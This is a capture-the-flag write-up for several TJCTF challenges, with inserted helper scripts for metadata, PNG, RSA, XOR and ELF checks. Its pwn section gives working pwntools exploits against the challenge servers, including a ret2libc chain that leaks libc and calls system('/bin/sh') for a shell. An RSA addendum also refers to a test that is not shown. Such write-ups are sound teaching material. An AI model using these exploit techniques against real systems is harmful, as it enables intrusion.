Forensics

fake-geoguessr

Challenge Description

We don't do guess challs here at TJCTF, so that means no Geoguessr 😞 Since I took this photo myself, though, you can find out precisely where it was taken, and some Bonus Content™️, from my Camera Model Name to the Circle Of Confusion. Maybe you'll find a flag there?
└─$ exiftool lake.jpg                                     
ExifTool Version Number : 12.41
File Name : lake.jpg
[REDACTED]
Copyright : tjctf{thats_a_
Exposure Time : 1/520
F Number : 2.2
Exposure Program : Program AE
ISO : 32
...................................................................
[REDACTED]
Application Record Version : 4
IPTC Digest : b443520a10119da99c2550175e6d0efb
Comment : lot_of_metadata}
[REDACTED]
...................................................................
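The exiftool run above shows the flag split across two different metadata containers: an EXIF tag (Copyright) inside the APP1 segment and the JPEG COM segment. To show where those strings physically live in the file, here is an added example, not part of the original writeup, that walks the JPEG marker segments, pulls printable strings out of each one, and stitches a prefix-delimited flag back together. The sample JPEG is constructed in-line (header segments only, no scan data); the `reassemble_flag` heuristic and the `tjctf{` prefix are this example's assumptions, and a real file can be passed as the first argument.

```python
import re
import struct

# Marker names for the segment types usually seen before the scan data
SEGMENT_NAMES = {0xC0: "SOF0", 0xC4: "DHT", 0xDB: "DQT", 0xE0: "APP0",
                 0xE1: "APP1", 0xED: "APP13", 0xFE: "COM"}


def iter_jpeg_segments(data: bytes):
    """Yield (marker, payload) for every length-prefixed segment up to SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos + 1 < len(data) and data[pos + 1] == 0xFF:   # skip fill bytes
            pos += 1
        if pos + 2 > len(data):
            return
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI, or SOS (entropy-coded data follows)
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # standalone markers, no length
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def metadata_strings(data: bytes, min_len: int = 6):
    """Return (segment name, printable ASCII run) pairs in file order."""
    found = []
    for marker, payload in iter_jpeg_segments(data):
        name = SEGMENT_NAMES.get(marker, f"0x{marker:02X}")
        for run in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, payload):
            found.append((name, run.decode("ascii")))
    return found


def reassemble_flag(strings, prefix: str = "tjctf{"):
    """Heuristic: start at the run holding the prefix, append later runs until a '}'."""
    parts = []
    for _, text in strings:
        if not parts:
            if prefix in text:
                parts.append(text[text.index(prefix):])
        else:
            parts.append(text)
        if parts and "}" in parts[-1]:
            flag = "".join(parts)
            return flag[:flag.index("}") + 1]
    return None


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample: APP1 (EXIF) carries the first half of the flag as a
# Copyright string, a COM segment carries the second half; scan data omitted.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xE1, b"Exif\x00\x00MM\x00*\x00\x00\x00\x08" + b"\x00" * 16
               + b"Copyright tjctf{thats_a_\x00")
    + _segment(0xFE, b"lot_of_metadata}")
    + b"\xff\xda"          # SOS: the walker stops here
    + b"\xff\xd9"
)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_JPEG
    found = metadata_strings(data)
    for name, text in found:
        print(f"{name:6} {text}")
    print("flag:", reassemble_flag(found))
```

The same walk is what a defender would run over images before they leave an organisation: every APPn and COM segment is a place where author data, GPS coordinates or, as here, arbitrary text rides along with the pixels.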

Flag : tjctf{thats_a_lot_of_metadata}

cool-school

Challenge Description

Wow TJ is such a cool school! This image really captures the vibes. But something seems off about the image...

I used StegSolve for this challenge


Flag : tjctf{lol_st3g_s0_co0l}

spongebob

Challenge Description

TJCTF is really cool and spongebob thinks so too. So cool in fact...wait a minute, isn't the meme usually 4 squares???

Using the TweakPNG tool, we change the image height to 1000 (or any large value) and save the changes.


When we open the image again, we get our flag.


Flag : tjctf{such_pogg3rs_ctf}
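What TweakPNG does for the height edit above is rewrite the IHDR chunk and recompute its CRC; the pixel rows were in the IDAT stream all along, the header just told viewers to stop early. The following added example (not from the writeup) does the same thing in Python and also adds the check a forensic analyst wants first: comparing the declared height with the number of scanlines the IDAT data actually decompresses to. The sample PNG is constructed in-line with two RGB rows but a header that claims one; only 8-bit samples and non-interlaced images are handled, which is an assumption of the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Samples per pixel by PNG colour type (grey, RGB, palette, grey+alpha, RGBA)
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}


def iter_chunks(data: bytes):
    """Yield (offset, type, body, stored_crc) for each chunk."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        yield pos, ctype, body, crc
        pos += 12 + length
        if ctype == b"IEND":
            return


def read_ihdr(data: bytes) -> dict:
    for _, ctype, body, _ in iter_chunks(data):
        if ctype == b"IHDR":
            w, h, depth, colour, _, _, _ = struct.unpack(">IIBBBBB", body)
            return {"width": w, "height": h, "bit_depth": depth, "colour_type": colour}
    raise ValueError("no IHDR chunk")


def crc_ok(data: bytes) -> bool:
    """True if every chunk's stored CRC matches its type+body (what TweakPNG fixes up)."""
    return all(crc == zlib.crc32(ctype + body) for _, ctype, body, crc in iter_chunks(data))


def rows_in_idat(data: bytes) -> int:
    """Decompress the pixel stream and count the scanlines it really holds."""
    ihdr = read_ihdr(data)
    if ihdr["bit_depth"] != 8:
        raise ValueError("only 8-bit samples handled here")
    bpp = CHANNELS[ihdr["colour_type"]]
    idat = b"".join(body for _, ctype, body, _ in iter_chunks(data) if ctype == b"IDAT")
    raw = zlib.decompress(idat)
    return len(raw) // (1 + ihdr["width"] * bpp)    # one filter byte per scanline


def set_height(data: bytes, new_height: int) -> bytes:
    """Rewrite the IHDR height and recompute its CRC, leaving everything else intact."""
    for pos, ctype, body, _ in iter_chunks(data):
        if ctype == b"IHDR":
            new_body = body[:4] + struct.pack(">I", new_height) + body[8:]
            new_crc = zlib.crc32(ctype + new_body)
            start = pos + 8
            return data[:start] + new_body + struct.pack(">I", new_crc) + data[start + len(body) + 4:]
    raise ValueError("no IHDR chunk")


def _chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


# Constructed sample: 2x2 RGB pixels in IDAT, but IHDR claims a height of 1,
# so a viewer shows only the top row.
_RAW = b"\x00" + b"\xff\x00\x00" * 2 + b"\x00" + b"\x00\xff\x00" * 2
SAMPLE_PNG = (PNG_SIGNATURE
              + _chunk(b"IHDR", struct.pack(">IIBBBBB", 2, 1, 8, 2, 0, 0, 0))
              + _chunk(b"IDAT", zlib.compress(_RAW))
              + _chunk(b"IEND", b""))

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PNG
    print("IHDR:", read_ihdr(data), "| rows in IDAT:", rows_in_idat(data), "| CRCs ok:", crc_ok(data))
    if len(sys.argv) > 2:                      # optional: write a copy with the height raised
        open(sys.argv[2], "wb").write(set_height(data, 1000))
```

A declared height smaller than the IDAT row count is the tell for this trick; the reverse (more rows declared than present) is what makes some viewers complain about truncated data after the edit, while still rendering what they have.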

sneaker-zipper

Sometimes the zippers can be sneaky...

For this challenge I unzipped the chall.zip file using CyberChef.


Then I saved the output as a text file; when I opened it, I found the flag.


Flag : tjctf{sneakers_with_zippers_are_hip_no?_874d174bb26fcf95}


Crypto

rsa-apprentice

Challenge Description

My friend sent me this secret message but I can't figure out how to decrypt it! Can you help?

We are given a problem.txt file which contains the RSA parameters:

==== SECRET RSA MESSAGE ====
n = 1216177716507739302616478655910148392804849
e = 65537
c1 = 257733734393970582988408159581244878149116
c2 = 843105902970788695411197846605744081831851

The flag is divided into two parts, encrypted as c1 and c2 under the same n and e. With n factored into p and q we can compute the private exponent (d1 and d2 below come out identical, since n and e are shared) and decrypt each ciphertext to get its part of the flag.

solver_part1.py

from Crypto.Util.number import long_to_bytes  # pycryptodome

n = 1216177716507739302616478655910148392804849
e = 65537
c1 = 257733734393970582988408159581244878149116

# Factors of n
p = 1033247481589406269253
q = 1177043968824330681533

phi = (p - 1) * (q - 1)
d1 = pow(e, -1, phi)        # private exponent (modular inverse; Python 3.8+)
flag1 = pow(c1, d1, p * q)  # RSA decryption: m = c^d mod n
print(long_to_bytes(flag1))


solver_part2.py

from Crypto.Util.number import long_to_bytes  # pycryptodome

n = 1216177716507739302616478655910148392804849
e = 65537
c2 = 843105902970788695411197846605744081831851

# Factors of n
p = 1033247481589406269253
q = 1177043968824330681533

phi = (p - 1) * (q - 1)
d2 = pow(e, -1, phi)        # same private exponent as for part 1
flag2 = pow(c2, d2, p * q)  # RSA decryption: m = c^d mod n
print(long_to_bytes(flag2))


Flag : tjctf{n0t_s0_S3cur3_Cryp70}
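The two solver scripts above repeat the same key derivation. As an added example (not the writeup's own code), here is the decryption written once with the checks a practitioner would add: confirm that p·q really equals n before trusting the factors, confirm that e is invertible modulo φ(n), derive d a single time and apply it to every ciphertext. The modulus, exponent, ciphertexts and factors are the ones from the writeup; `int_to_bytes` replaces pycryptodome's `long_to_bytes` so the script needs only the standard library.

```python
from math import gcd

# Values from the writeup's problem.txt and the factors its solver uses
N = 1216177716507739302616478655910148392804849
E = 65537
C1 = 257733734393970582988408159581244878149116
C2 = 843105902970788695411197846605744081831851
P = 1033247481589406269253
Q = 1177043968824330681533


def int_to_bytes(x: int) -> bytes:
    """Big-endian encoding, the same thing Crypto.Util.number.long_to_bytes does."""
    return x.to_bytes(max(1, (x.bit_length() + 7) // 8), "big")


def private_exponent(e: int, p: int, q: int) -> int:
    """d = e^-1 mod phi(n); raises if e is not invertible."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e shares a factor with phi(n); no private exponent exists")
    return pow(e, -1, phi)          # Python 3.8+


def rsa_encrypt(m: int, e: int, n: int) -> int:
    """Textbook RSA, used here only to round-trip the toy parameters."""
    return pow(m, e, n)


def rsa_decrypt_all(n: int, e: int, p: int, q: int, ciphertexts) -> list:
    """Check the factorisation once, derive d once, decrypt every ciphertext with it."""
    if p * q != n:
        raise ValueError("p * q != n: these are not the factors of this modulus")
    d = private_exponent(e, p, q)
    return [int_to_bytes(pow(c, d, n)) for c in ciphertexts]


def recover_flag() -> str:
    """Decrypt both halves of the challenge message and join them."""
    parts = rsa_decrypt_all(N, E, P, Q, [C1, C2])
    return b"".join(parts).decode("ascii", errors="replace")


if __name__ == "__main__":
    print(recover_flag())
```

The toy parameters in the test (n = 3233, e = 17, d = 2753) are the standard textbook example; the point of the example is the structure, and the reason the challenge falls is the size of n, which at roughly 140 bits is far below anything that resists factoring.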

flimsy-fingered-latin-teacher

Challenge Description

Oh no! My Latin teacher likes to touch type on her Dell laptop, but she has trouble keeping her fingers on the right keys in home row. The letters she's typing out don't really make sense. Can you help me understand what she's saying so she doesn't get upset when I come to her confused?
ykvyg}pp[djp,rtpelru[pdoyopm|

This is a keyboard shift cipher: every character was typed one key to the right of the intended one on a QWERTY layout, so shifting each character one key to the left along its row recovers the message.


Flag : tjctf{oopshomerowkeyposition}
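The decode above is a row-wise shift on a US QWERTY layout, including the shifted punctuation (`}` and `|` on the bracket keys). As an added example that is not part of the writeup, here is a small decoder that tries every small left and right shift and keeps the ones that produce the expected `tjctf{` prefix; the row tables and the prefix are this example's assumptions, and characters outside the tables pass through unchanged.

```python
# One string per physical row, unshifted and shifted, left to right (US QWERTY)
QWERTY_ROWS = [
    "`1234567890-=", "~!@#$%^&*()_+",
    "qwertyuiop[]\\", "QWERTYUIOP{}|",
    "asdfghjkl;'", 'ASDFGHJKL:"',
    "zxcvbnm,./", "ZXCVBNM<>?",
]

CIPHERTEXT = "ykvyg}pp[djp,rtpelru[pdoyopm|"   # from the challenge text


def keyboard_shift(text: str, shift: int) -> str:
    """Move each character `shift` keys along its row (negative = left); others pass through."""
    out = []
    for ch in text:
        for row in QWERTY_ROWS:
            i = row.find(ch)
            if i != -1:
                out.append(row[(i + shift) % len(row)])   # wrap at the row ends
                break
        else:
            out.append(ch)
    return "".join(out)


def candidate_shifts(ciphertext: str, prefix: str = "tjctf{", max_shift: int = 3):
    """Try small shifts in both directions; keep those yielding the expected prefix."""
    hits = []
    for s in range(-max_shift, max_shift + 1):
        if s == 0:
            continue
        plain = keyboard_shift(ciphertext, s)
        if plain.startswith(prefix):
            hits.append((s, plain))
    return hits


if __name__ == "__main__":
    for s, plain in candidate_shifts(CIPHERTEXT):
        print(f"shift {s:+d}: {plain}")
```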


pwn

vacation-1

Challenge Description

Too much school, too much work, too much writing CTF challenges... can I just go on vacation?

nc tjc.tf 31680

This is a simple ret2win challenge: the saved return address is overwritten with the address of the win function.

exploit.py

from pwn import *

shell = remote('tjc.tf', 31680)
# 24 bytes to reach the saved return address, a lone `ret` gadget to keep the
# stack 16-byte aligned, then the address to return into (the win function)
shell.sendline(b'A' * 24 + p64(0x40101a) + p64(0x401196))
shell.interactive()


Flag : tjctf{wh4t_a_n1c3_plac3_ind33d!_7609d40aeba4844c}

vacation-2

Challenge Description

Travel agency said we can't go there anymore...

nc tjc.tf 31705

A classic ret2libc challenge: leak the address of puts through its GOT entry, compute the libc base from the known libc build, then return into system("/bin/sh").

exploit.py

from pwn import *

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

def find_ip(payload):
    # Launch process and send payload
    p = process(exe)
    p.sendlineafter(b'today?', payload)
    # Wait for the process to crash
    p.wait()
    # Print out the address of EIP/RIP at the time of crashing
    # ip_offset = cyclic_find(p.corefile.pc)  # x86
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4))  # x64
    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
    return ip_offset

# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
break main
continue
'''.format(**locals())

# Set up pwntools for the correct architecture
exe = './chall'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'

# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================

# Lib-C library
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # Local

libc = ELF('libc6_2.31-0ubuntu9.7_amd64.so')  # Remote

# Pass in pattern_size, get back EIP/RIP offset
offset = find_ip(cyclic(1000))

# Start program
io = start()

# POP RDI and ret (stack alignment) from ropper
pop_rdi = 0x401243
ret = 0x40101a

# Payload to leak libc function
payload = flat({
    offset: [
        pop_rdi,
        elf.got.puts,
        elf.plt.puts,
        elf.symbols.main
    ]
})

# Send the payload
io.sendlineafter(b'today?', payload)

io.recvline()  # Receive the newline

# Retrieve got.puts address
got_puts = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_puts: %#x", got_puts)

# Subtract puts offset to get libc base
libc.address = got_puts - libc.symbols.puts
info("libc_base: %#x", libc.address)

# System(/bin/sh)
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

# Payload to get shell
payload = flat({
    offset: [
        pop_rdi,
        bin_sh,
        ret,
        libc.symbols.system
    ]
})

# Send the payload
io.sendline(payload)

# Got Shell?
io.interactive()


Flag : tjctf{w3_g0_wher3_w3_w4nt_t0!_66f7020620e343ff}
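Both vacation exploits rely on fixed addresses (the `ret` and `pop rdi` gadgets, the win function, the PLT and GOT entries), which only line up when the binary is not position-independent; the libc leak in vacation-2 is needed precisely because the library, unlike the binary, is loaded at a random base. The following added example, which is not part of the writeup, reads the same facts that pwntools' `checksec` reports (PIE, NX, RELRO) straight from the ELF header and program headers, so you can see at a glance which of these a binary is missing. The two ELF images are constructed in-line (headers only, no code), and "RELRO" here means the PT_GNU_RELRO segment is present; distinguishing partial from full RELRO would additionally need the dynamic section, which this example does not parse.

```python
import struct

ET_DYN = 3                      # e_type of a position-independent executable
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1


def elf_mitigations(data: bytes) -> dict:
    """Report PIE / NX / RELRO for an ELF64 image from its headers alone."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2:                              # EI_CLASS: 2 = ELF64
        raise ValueError("only ELF64 is handled here")
    end = "<" if data[5] == 1 else ">"            # EI_DATA: 1 = little-endian
    (e_type,) = struct.unpack(end + "H", data[16:18])
    (e_phoff,) = struct.unpack(end + "Q", data[32:40])
    e_phentsize, e_phnum = struct.unpack(end + "HH", data[54:58])

    nx = False      # no PT_GNU_STACK at all: the loader allows an executable stack
    relro = False
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, p_flags = struct.unpack(end + "II", data[off:off + 8])
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)             # NX when the stack is not executable
        elif p_type == PT_GNU_RELRO:
            relro = True                          # partial at least; full needs BIND_NOW
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


# --- constructed sample images: ELF64 header plus program headers, nothing else ---
def _phdr(p_type: int, p_flags: int) -> bytes:
    return struct.pack("<IIQQQQQQ", p_type, p_flags, 0, 0, 0, 0, 0, 0)


def _elf64(e_type: int, phdrs) -> bytes:
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8     # 64-bit, LE, SysV ABI
    header = struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0x401000,
                         64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    return ident + header + b"".join(phdrs)


# ET_EXEC with a read/write (non-executable) stack: fixed addresses, like the challenge binaries
NO_PIE_SAMPLE = _elf64(2, [_phdr(PT_GNU_STACK, 0x6)])
# ET_DYN with NX stack and a RELRO segment: what a hardened build looks like
HARDENED_SAMPLE = _elf64(ET_DYN, [_phdr(PT_GNU_STACK, 0x6), _phdr(PT_GNU_RELRO, 0x4)])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else NO_PIE_SAMPLE
    print(elf_mitigations(data))
```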


Rev

take-a-l

Challenge Description

I need W :angry:

We are given a binary to work with


main function


flag


After converting the flag values to decimal we get:

102, 120, 113, 102, 116, 105, 117, 117, 117, 115, 127, 119, 96, 97, 97, 97, 97, 97, 97, 97, 97, 97, 39, 97, 111

I just threw them into CyberChef, converted them from decimal, and then did an XOR brute force.


Flag : tjctf{gggamersssssssss5s}
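CyberChef's XOR Brute Force tries all 256 single-byte keys and leaves the ranking to the reader. As an added example that is not part of the writeup, here is the same brute force in Python over the decimal values listed above, with the two filters that matter: "output is entirely printable" (which still leaves several candidates here) and "output starts with the known flag prefix" (which pins the key down to one). The printable-byte set and the `tjctf{` prefix are this example's assumptions.

```python
import string

# Byte values recovered from the binary in the writeup (decimal)
FLAG_VALUES = [102, 120, 113, 102, 116, 105, 117, 117, 117, 115, 127, 119,
               96, 97, 97, 97, 97, 97, 97, 97, 97, 97, 39, 97, 111]

# Bytes accepted as readable text: printable ASCII minus vertical tab / form feed
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def fully_printable_keys(data: bytes) -> list:
    """Every key whose output is entirely printable: the usual first filter, often ambiguous."""
    return [k for k in range(256) if set(xor_single_byte(data, k)) <= PRINTABLE]


def brute_force_xor(data: bytes, prefix: bytes = b"tjctf{") -> list:
    """(key, plaintext) pairs whose output starts with the known flag prefix."""
    return [(k, xor_single_byte(data, k)) for k in range(256)
            if xor_single_byte(data, k).startswith(prefix)]


def recover_flag(values=FLAG_VALUES) -> str:
    """Return the unique prefix-matching decode, or fail loudly if it is not unique."""
    hits = brute_force_xor(bytes(values))
    if len(hits) != 1:
        raise ValueError(f"expected exactly one key, got {len(hits)}")
    _, plain = hits[0]
    return plain.decode("ascii")


if __name__ == "__main__":
    data = bytes(FLAG_VALUES)
    print("keys giving fully printable output:", fully_printable_keys(data))
    for key, plain in brute_force_xor(data):
        print(f"key 0x{key:02x}: {plain!r}")
```

With a single-byte key, six known prefix bytes are more than enough: the first byte alone fixes the key, and the remaining five confirm it.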


I hope You enjoyed the writeups (=^ ◡ ^=)